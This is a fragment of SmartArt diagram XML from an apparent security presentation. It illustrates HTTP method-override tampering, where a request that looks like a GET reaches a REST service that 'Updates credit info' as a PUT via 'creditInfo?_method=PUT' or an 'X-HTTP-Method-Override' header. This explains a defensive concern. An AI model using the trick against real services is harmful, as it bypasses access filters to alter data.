    <dgm:pt modelId="{D06C760D-56FE-4429-A440-A2EF45A5BDC7}" type="parTrans" cxnId="{E48C4600-5E61-4DD4-9BCF-8F92DE8FAC2F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B924D73D-1342-46E9-8680-09A8BE1D6BB8}" type="sibTrans" cxnId="{E48C4600-5E61-4DD4-9BCF-8F92DE8FAC2F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9A7ED47B-8685-4D2A-A357-928002311FC0}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
            <a:t>Security Filter/Servlet</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{22B6974E-8293-4923-AD9E-E7ADC2C2A83B}" type="parTrans" cxnId="{5E032799-21AD-433D-8E6A-DB39BDD17F5B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{13B87A77-079C-4B4A-947A-8D27E1115D5F}" type="sibTrans" cxnId="{5E032799-21AD-433D-8E6A-DB39BDD17F5B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E51959D9-6D8B-4A01-A2F6-0EB95CA60500}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
            <a:t>Looks like a GET </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>but turns into PUT, POST, or DELETE</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{86A62ED2-8BAE-4B55-816E-F4731B90A12E}" type="parTrans" cxnId="{7BFBE164-C775-4E81-A15D-127542AFFAB7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CD07A591-CD01-4470-9282-4C1C626BC661}" type="sibTrans" cxnId="{7BFBE164-C775-4E81-A15D-127542AFFAB7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6315456A-04C4-4BED-BD37-3BC8780E878B}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
            <a:t>REST Service</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{022C20FA-4F9E-4105-8293-3627BCE0D807}" type="parTrans" cxnId="{95161757-58DD-4550-9F4A-56A2D838F253}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0F7EA48B-04B4-4B71-913C-18C54F9F01CE}" type="sibTrans" cxnId="{95161757-58DD-4550-9F4A-56A2D838F253}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B3BC58FA-4CDE-4FAE-8E5A-75EE2E2FA4ED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Updates</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
            <a:t> credit info</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FBA7D9CB-2AD4-4E0F-BCB7-D2E9ED28FF9D}" type="parTrans" cxnId="{D77E34FD-04E7-40CB-B866-47903B166A03}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9B28B57A-3DCA-463A-B785-DB90C9DBBA94}" type="sibTrans" cxnId="{D77E34FD-04E7-40CB-B866-47903B166A03}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A300329C-9C44-4DC1-B2E1-BDAF683BC2DA}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
            <a:t>creditInfo</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
            <a:t>?_method=PUT</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FD196A85-64D0-4B26-B41F-2A6D93D0B766}" type="parTrans" cxnId="{46636AD6-36B9-4358-8F53-E056FBDDD7E8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EDAE1333-97DC-4700-8B04-637DF61F94EB}" type="sibTrans" cxnId="{46636AD6-36B9-4358-8F53-E056FBDDD7E8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B2603003-9D8F-43B8-9607-80F296CA6A73}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
            <a:t>“</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>_method</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
            <a:t>” parameter</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{709FE74C-5E67-435C-96DE-6A567F811CD1}" type="parTrans" cxnId="{7A266905-68E6-43C8-B545-0D640D06C2B7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4DF96C84-3081-48F3-AA76-AA77129C07F4}" type="sibTrans" cxnId="{7A266905-68E6-43C8-B545-0D640D06C2B7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1DE89CCA-4075-43D3-B4B1-F045B07DAFE6}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
            <a:t>“</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>X-HTTP-Method-Override</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
            <a:t>” header</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AF7616F9-0F82-4570-BBF7-72AC9E4E191D}" type="parTrans" cxnId="{11771AF8-B86F-45C7-8EF5-EB3F027599C4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D32823F7-4F14-4CC2-89A2-F2E6844E3302}" type="sibTrans" cxnId="{11771AF8-B86F-45C7-8EF5-EB3F027599C4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{65269ED6-77B6-414F-837C-2226F4C7B1A6}" type="pres">
      <dgm:prSet presAssocID="{2F471AF0-C95E-4157-A86F-7B88789153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1CBABE-4A74-4862-8256-ED08F2A420BE}" type="pres">
      <dgm:prSet presAssocID="{275F95C2-BC2C-4C3D-9A35-DFA22230486B}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A63C3CF9-BB96-4302-8504-64A811482ECD}" type="pres">
      <dgm:prSet presAssocID="{275F95C2-BC2C-4C3D-9A35-DFA2223048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1E46B-DCC6-47DC-8390-673BE81125DE}" type="pres">
      <dgm:prSet presAssocID="{275F95C2-BC2C-4C3D-9A35-DFA22230486B}" presName="parSh" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3" custScaleX="100309" custLinFactY="-77312" custLinFactNeighborX="3246" custLinFactNeighborY="-100000"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1E7E9D61-41C6-4129-B54D-4C2041A92D3C}" type="pres">
      <dgm:prSet presAssocID="{275F95C2-BC2C-4C3D-9A35-DFA22230486B}" presName="desTx" presStyleLbl="fgAcc1" presStyleIdx="0" presStyleCnt="3" custScaleX="146455" custScaleY="271940" custLinFactNeighborX="22023" custLinFactNeighborY="-14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23799-854B-429A-8D09-520241E2711F}" type="pres">
      <dgm:prSet presAssocID="{8F2411C2-D38A-4B84-82F3-C68AC79A43AA}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="2" custLinFactNeighborX="-26356"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1B517089-A97A-48C7-9FBB-ADDABA7CE1F6}" type="pres">
      <dgm:prSet presAssocID="{8F2411C2-D38A-4B84-82F3-C68AC79A43AA}" presName="connTx" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5EA6EC48-0CBB-40BA-A308-07B625E995A5}" type="pres">
      <dgm:prSet presAssocID="{9A7ED47B-8685-4D2A-A357-928002311FC0}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{702031A4-1183-45C7-8177-3C1B0FCB821D}" type="pres">
      <dgm:prSet presAssocID="{9A7ED47B-8685-4D2A-A357-928002311F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CE5C-40E2-4A8D-A14F-0D976B032608}" type="pres">
      <dgm:prSet presAssocID="{9A7ED47B-8685-4D2A-A357-928002311FC0}" presName="parSh" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3" custScaleX="100309" custLinFactY="-81603" custLinFactNeighborX="-32405" custLinFactNeighborY="-100000"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F49D1FF0-4D10-47CF-9C48-94106BE0C25E}" type="pres">
      <dgm:prSet presAssocID="{9A7ED47B-8685-4D2A-A357-928002311FC0}" presName="desTx" presStyleLbl="fgAcc1" presStyleIdx="1" presStyleCnt="3" custScaleX="191096" custScaleY="272047" custLinFactNeighborX="3806" custLinFactNeighborY="-11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9C6C-AA30-48ED-BB75-FBCC4FC8EE28}" type="pres">
      <dgm:prSet presAssocID="{13B87A77-079C-4B4A-947A-8D27E1115D5F}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="2" custLinFactNeighborX="-33852"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B626A543-9BD1-4741-8DB3-716D03BB281A}" type="pres">
      <dgm:prSet presAssocID="{13B87A77-079C-4B4A-947A-8D27E1115D5F}" presName="connTx" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E9737008-A374-4A31-8A1E-7B51B22D0F2C}" type="pres">
      <dgm:prSet presAssocID="{6315456A-04C4-4BED-BD37-3BC8780E878B}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{495F4BCC-37E2-4C0F-BB32-E2E5A8CECD2A}" type="pres">
      <dgm:prSet presAssocID="{6315456A-04C4-4BED-BD37-3BC8780E878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5658-B3EE-4595-A16D-CAEB9C026BA4}" type="pres">
      <dgm:prSet presAssocID="{6315456A-04C4-4BED-BD37-3BC8780E878B}" presName="parSh" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3" custScaleX="100309" custLinFactY="-104860" custLinFactNeighborX="-17539" custLinFactNeighborY="-200000"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E5BEEFFD-EAD1-442D-90E7-1876139AB981}" type="pres">
      <dgm:prSet presAssocID="{6315456A-04C4-4BED-BD37-3BC8780E878B}" presName="desTx" presStyleLbl="fgAcc1" presStyleIdx="2" presStyleCnt="3" custScaleX="100707" custScaleY="60996" custLinFactY="-49391" custLinFactNeighborX="-2784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E34FD-04E7-40CB-B866-47903B166A03}" srcId="{6315456A-04C4-4BED-BD37-3BC8780E878B}" destId="{B3BC58FA-4CDE-4FAE-8E5A-75EE2E2FA4ED}" srcOrd="0" destOrd="0" parTransId="{FBA7D9CB-2AD4-4E0F-BCB7-D2E9ED28FF9D}" sibTransId="{9B28B57A-3DCA-463A-B785-DB90C9DBBA94}"/>
    <dgm:cxn modelId="{A137D93A-206D-41B9-A362-C256B7D42DBE}" type="presOf" srcId="{2F471AF0-C95E-4157-A86F-7B88789153CA}" destId="{65269ED6-77B6-414F-837C-2226F4C7B1A6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{25549976-2B48-4BF2-82EE-F409A953E78F}" type="presOf" srcId="{A300329C-9C44-4DC1-B2E1-BDAF683BC2DA}" destId="{F49D1FF0-4D10-47CF-9C48-94106BE0C25E}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{FA52865B-BEEC-4F28-9FC7-60F5B4A23786}" type="presOf" srcId="{13B87A77-079C-4B4A-947A-8D27E1115D5F}" destId="{B626A543-9BD1-4741-8DB3-716D03BB281A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{88A20A97-B849-4571-8ECF-A8CC9A4F761D}" type="presOf" srcId="{13B87A77-079C-4B4A-947A-8D27E1115D5F}" destId="{3A279C6C-AA30-48ED-BB75-FBCC4FC8EE28}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{11771AF8-B86F-45C7-8EF5-EB3F027599C4}" srcId="{275F95C2-BC2C-4C3D-9A35-DFA22230486B}" destId="{1DE89CCA-4075-43D3-B4B1-F045B07DAFE6}" srcOrd="2" destOrd="0" parTransId="{AF7616F9-0F82-4570-BBF7-72AC9E4E191D}" sibTransId="{D32823F7-4F14-4CC2-89A2-F2E6844E3302}"/>
    <dgm:cxn modelId="{B28BDF3A-AD71-4B33-9293-C89288E29F11}" type="presOf" srcId="{8F2411C2-D38A-4B84-82F3-C68AC79A43AA}" destId="{F3823799-854B-429A-8D09-520241E2711F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{21F19DD1-AB2B-4ECE-BC04-41C8ECBEFACD}" type="presOf" srcId="{275F95C2-BC2C-4C3D-9A35-DFA22230486B}" destId="{A63C3CF9-BB96-4302-8504-64A811482ECD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{D8E6A6B8-DA6E-4D54-80E1-B4B6FD1EB539}" type="presOf" srcId="{275F95C2-BC2C-4C3D-9A35-DFA22230486B}" destId="{A2B1E46B-DCC6-47DC-8390-673BE81125DE}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{0B951823-3EA9-411A-8E75-E79B739EC271}" srcId="{2F471AF0-C95E-4157-A86F-7B88789153CA}" destId="{275F95C2-BC2C-4C3D-9A35-DFA22230486B}" srcOrd="0" destOrd="0" parTransId="{9F8D064A-5065-41AF-B5F9-4274A34BD373}" sibTransId="{8F2411C2-D38A-4B84-82F3-C68AC79A43AA}"/>
    <dgm:cxn modelId="{19998B5E-8C40-4373-96E2-3782429728BC}" type="presOf" srcId="{B3BC58FA-4CDE-4FAE-8E5A-75EE2E2FA4ED}" destId="{E5BEEFFD-EAD1-442D-90E7-1876139AB981}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{D506429A-A6C6-40E4-A328-388B0D81AF75}" type="presOf" srcId="{B2603003-9D8F-43B8-9607-80F296CA6A73}" destId="{1E7E9D61-41C6-4129-B54D-4C2041A92D3C}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{47F8F99E-8BBE-43BA-8A67-EA6FBE412024}" type="presOf" srcId="{B9C0AA30-C456-48B0-BDEC-84A4FFF0C030}" destId="{1E7E9D61-41C6-4129-B54D-4C2041A92D3C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{E48C4600-5E61-4DD4-9BCF-8F92DE8FAC2F}" srcId="{275F95C2-BC2C-4C3D-9A35-DFA22230486B}" destId="{B9C0AA30-C456-48B0-BDEC-84A4FFF0C030}" srcOrd="0" destOrd="0" parTransId="{D06C760D-56FE-4429-A440-A2EF45A5BDC7}" sibTransId="{B924D73D-1342-46E9-8680-09A8BE1D6BB8}"/>
    <dgm:cxn modelId="{46636AD6-36B9-4358-8F53-E056FBDDD7E8}" srcId="{9A7ED47B-8685-4D2A-A357-928002311FC0}" destId="{A300329C-9C44-4DC1-B2E1-BDAF683BC2DA}" srcOrd="1" destOrd="0" parTransId="{FD196A85-64D0-4B26-B41F-2A6D93D0B766}" sibTransId="{EDAE1333-97DC-4700-8B04-637DF61F94EB}"/>
    <dgm:cxn modelId="{9CEE899A-C493-4809-A1FC-48EA2B2F334F}" type="presOf" srcId="{6315456A-04C4-4BED-BD37-3BC8780E878B}" destId="{495F4BCC-37E2-4C0F-BB32-E2E5A8CECD2A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{5E032799-21AD-433D-8E6A-DB39BDD17F5B}" srcId="{2F471AF0-C95E-4157-A86F-7B88789153CA}" destId="{9A7ED47B-8685-4D2A-A357-928002311FC0}" srcOrd="1" destOrd="0" parTransId="{22B6974E-8293-4923-AD9E-E7ADC2C2A83B}" sibTransId="{13B87A77-079C-4B4A-947A-8D27E1115D5F}"/>
    <dgm:cxn modelId="{D63B9F97-F62A-4890-9515-DF76D2EB931D}" type="presOf" srcId="{1DE89CCA-4075-43D3-B4B1-F045B07DAFE6}" destId="{1E7E9D61-41C6-4129-B54D-4C2041A92D3C}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{7BFBE164-C775-4E81-A15D-127542AFFAB7}" srcId="{9A7ED47B-8685-4D2A-A357-928002311FC0}" destId="{E51959D9-6D8B-4A01-A2F6-0EB95CA60500}" srcOrd="0" destOrd="0" parTransId="{86A62ED2-8BAE-4B55-816E-F4731B90A12E}" sibTransId="{CD07A591-CD01-4470-9282-4C1C626BC661}"/>
    <dgm:cxn modelId="{44C518A8-8B15-46C2-A04F-03B53F4C4800}" type="presOf" srcId="{8F2411C2-D38A-4B84-82F3-C68AC79A43AA}" destId="{1B517089-A97A-48C7-9FBB-ADDABA7CE1F6}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{95161757-58DD-4550-9F4A-56A2D838F253}" srcId="{2F471AF0-C95E-4157-A86F-7B88789153CA}" destId="{6315456A-04C4-4BED-BD37-3BC8780E878B}" srcOrd="2" destOrd="0" parTransId="{022C20FA-4F9E-4105-8293-3627BCE0D807}" sibTransId="{0F7EA48B-04B4-4B71-913C-18C54F9F01CE}"/>
    <dgm:cxn modelId="{F82F1191-EA63-44F5-82F3-F3DCE0ACD7F2}" type="presOf" srcId="{E51959D9-6D8B-4A01-A2F6-0EB95CA60500}" destId="{F49D1FF0-4D10-47CF-9C48-94106BE0C25E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{7A266905-68E6-43C8-B545-0D640D06C2B7}" srcId="{275F95C2-BC2C-4C3D-9A35-DFA22230486B}" destId="{B2603003-9D8F-43B8-9607-80F296CA6A73}" srcOrd="1" destOrd="0" parTransId="{709FE74C-5E67-435C-96DE-6A567F811CD1}" sibTransId="{4DF96C84-3081-48F3-AA76-AA77129C07F4}"/>
    <dgm:cxn modelId="{28E8DBC8-7FD6-4AAF-88C6-7001611B1ED8}" type="presOf" srcId="{9A7ED47B-8685-4D2A-A357-928002311FC0}" destId="{F20DCE5C-40E2-4A8D-A14F-0D976B032608}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{483D3D73-BBAF-49A0-8176-F627E8D41D60}" type="presOf" srcId="{6315456A-04C4-4BED-BD37-3BC8780E878B}" destId="{A6C95658-B3EE-4595-A16D-CAEB9C026BA4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{8019B64F-AF2C-435C-ABDD-8834233F3524}" type="presOf" srcId="{9A7ED47B-8685-4D2A-A357-928002311FC0}" destId="{702031A4-1183-45C7-8177-3C1B0FCB821D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{69C3685B-3432-4C17-A5F5-F3CACC833058}" type="presParOf" srcId="{65269ED6-77B6-414F-837C-2226F4C7B1A6}" destId="{E31CBABE-4A74-4862-8256-ED08F2A420BE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{BEA057E5-E83C-446A-8CF0-DE902B125730}" type="presParOf" srcId="{E31CBABE-4A74-4862-8256-ED08F2A420BE}" destId="{A63C3CF9-BB96-4302-8504-64A811482ECD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{025C06DE-3A6F-4054-9DBF-1F1ED112CFC1}" type="presParOf" srcId="{E31CBABE-4A74-4862-8256-ED08F2A420BE}" destId="{A2B1E46B-DCC6-47DC-8390-673BE81125DE}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{F1943FB6-CC4C-4415-B588-4D79E2ADD631}" type="presParOf" srcId="{E31CBABE-4A74-4862-8256-ED08F2A420BE}" destId="{1E7E9D61-41C6-4129-B54D-4C2041A92D3C}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{991ED91F-AEC7-4322-BB9F-9F30F37C8D46}" type="presParOf" srcId="{65269ED6-77B6-414F-837C-2226F4C7B1A6}" destId="{F3823799-854B-429A-8D09-520241E2711F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{4EFF1ADB-3F8C-4BB5-83BF-A964C0BF75B4}" type="presParOf" srcId="{F3823799-854B-429A-8D09-520241E2711F}" destId="{1B517089-A97A-48C7-9FBB-ADDABA7CE1F6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{1AC25891-4273-4D41-AB43-9970872E6F22}" type="presParOf" srcId="{65269ED6-77B6-414F-837C-2226F4C7B1A6}" destId="{5EA6EC48-0CBB-40BA-A308-07B625E995A5}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{121065E7-7B8E-43B1-BDDE-0452810EB58E}" type="presParOf" srcId="{5EA6EC48-0CBB-40BA-A308-07B625E995A5}" destId="{702031A4-1183-45C7-8177-3C1B0FCB821D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{9A1ABA48-7363-48F1-B92D-03EB8228D857}" type="presParOf" srcId="{5EA6EC48-0CBB-40BA-A308-07B625E995A5}" destId="{F20DCE5C-40E2-4A8D-A14F-0D976B032608}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{D35C30CB-6B16-49B1-BDF0-4BD24E78C7AD}" type="presParOf" srcId="{5EA6EC48-0CBB-40BA-A308-07B625E995A5}" destId="{F49D1FF0-4D10-47CF-9C48-94106BE0C25E}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{D41C6FCD-6A14-4FB5-92E1-86D5F8262CA0}" type="presParOf" srcId="{65269ED6-77B6-414F-837C-2226F4C7B1A6}" destId="{3A279C6C-AA30-48ED-BB75-FBCC4FC8EE28}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{56C11CF4-5BB2-48D3-B759-739C86AFE9FE}" type="presParOf" srcId="{3A279C6C-AA30-48ED-BB75-FBCC4FC8EE28}" destId="{B626A543-9BD1-4741-8DB3-716D03BB281A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
